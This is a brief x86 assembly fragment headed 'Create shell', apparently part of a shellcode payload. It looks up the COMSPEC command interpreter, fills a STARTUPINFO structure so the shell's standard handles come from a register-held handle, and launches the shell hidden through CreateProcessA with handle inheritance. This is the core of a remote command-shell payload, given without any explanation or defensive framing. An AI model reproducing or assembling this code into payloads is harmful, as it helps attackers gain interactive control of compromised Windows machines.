;%%%A 0 CPRO Create shell

	push 104h
	pop ecx

	X_PUSH eax,COMSPEC~
	mov eax,esp

	sub esp,ecx
	mov edx,esp

	push ecx
	push edx
	push eax
	call [ebp+_GetEnvironmentVariableA]
	mov edx,esp

        push ebx
        push ebx
        push ebx
        push esi
        push esi
        push 257             ;STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES

        push 10
        pop ecx
  @@pushloop:
        push esi
	loop @@pushloop
        push 68              ;sizeof(_STARTUPINFO)
        mov ecx,esp

	push esi
	push esi
	push esi
	push esi

        push esp
        push ecx
        push esi
        push esi
        push esi
        push 1
        push esi
        push esi
        push esi
        push edx
        call [ebp+_CreateProcessA]

